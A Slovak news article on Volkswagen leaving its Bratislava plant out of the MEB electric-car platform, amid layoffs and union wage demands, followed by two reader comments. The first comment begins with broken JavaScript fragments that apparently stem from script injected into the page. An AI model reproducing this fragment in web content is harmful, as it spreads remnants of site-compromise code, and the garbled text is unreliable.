Volkswagen v Bratislave aktuálne prepúšťa a nepočíta sa s ním ani pri elektromobilite

Nemecký koncern Volkswagen pred pár dňami ohlásil zásadnú ofenzívu pri elektromobiloch. Už do roku 2028 chce vyrábať sedemdesiat nových elektrických modelov namiesto pôvodne plánovaných päťdesiatich. Ambiciózny plán stať sa svetovou jednotkou v elektromobiloch však nepočíta s bratislavským závodom.

Bratislava patrila medzi premiantov, dnes v klube budúcnosti chýba

Zásadným krokom je prestavenie fabrík na spoločnú platformu MEB. Prvým závodom v tomto smere bude nemecký Zwickau, kde sa v minulosti vyrábali vozidlá značky Trabant. Na zozname siedmich výrobných závodov, kde plánujú do roku 2026 rozbehnúť výrobu e-áut na platforme MEB však Bratislava chýba. Pritom bratislavský závod doteraz vždy patril medzi premiantov a získaval zákazky na výrobu luxusných automobilov, najnáročnejších na výrobu, na ktorých stála zásadná časť reputácie firmy. Bratislava bola tiež prvá v rámci koncernu, kde sa začali vyrábať čisto elektrické vozidlá v roku 2013. A takisto jej patrí prvenstvo vo výrobe hybridného automobilu – Touareg Hybrid.

Volkswagen v Bratislave len nedávno oznámil znižovanie stavov, a to po dlhých rokov sústavného zvyšovania počtu zamestnancov. Podľa odhadov by mohol počet zamestnancov v závode klesnúť až o tritisíc. Neoficiálne sa tiež hovorí o konci miniáut, za ktoré fabrika stále nemá náhradu. Do toho teraz prichádza informácia o tom, že Bratislava nebude vyrábať elektromobily na spoločnej budúcej platforme. Otázkou ostáva, či a ako tieto kroky ovplyvnil prvý ostrý štrajk v dejinách závodu a takisto stále hlasnejšie požiadavky odborárov na razantnejšie zvyšovanie miezd. Pretože lacná pracovná sila je stále zásadnou výhodou bratislavského závodu.

Volkswagen kvôli elektromobilom prepustí časť zamestnancov

Volkswagen nezatvára oči pred dopadmi masívnejšieho nástupu elektromobility pre zamestnanosť. Elektroauto sa totiž dá vyrábať s asi o tretinu nižším počtom pracovníkov ako klasické autá so spaľovacími motormi. Tým pádom Volkswagen počíta s rušením 5- až 7-tisíc pracovných pozícií do roku 2023. To je relatívne malé číslo z celosvetového počtu 655-tisíc zamestnancov. VW vyčíslil úspory z tohto titulu na 5,9 miliardy eur ročne. Volkswagen uvádza, že  primárne chce stavy znižovať odchodmi do dôchodku  namiesto prepúšťania.

2 komentáre

  1. Todom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to je výsledok práce odborárov…

  2. VW v Bratislave v prvom rade vyrába luxusné autá pre toto. Luxusné autá Touareg, Porsche Cayenne, Audi Q… smerujú predovšetkým na trhy, kde sa za ne platí americkým dolárom (USD): USA, Čína, atď. Kurz USD je pod kurzom €. Keby sa tieto luxusné autá vyrábali napr. v Nemecku, kde je drahá pracovná sila, tak by náklady na výrobu týchto áut boli vysoké a na dolárových trhoch by boli nepredajné, resp. by mala firma VW za ne veľmi malý zisk. Preto sa tieto luxusné autá vyrábajú v Bratislave, lebo sú tam nižšie platy a nižšie náklady na výrobu. A vo VW Bratislava sa robí celkom kvalitne.

Přidat komentář

Vaša e-mailová adresa nebude zverejnená. Vyžadované polia sú označené *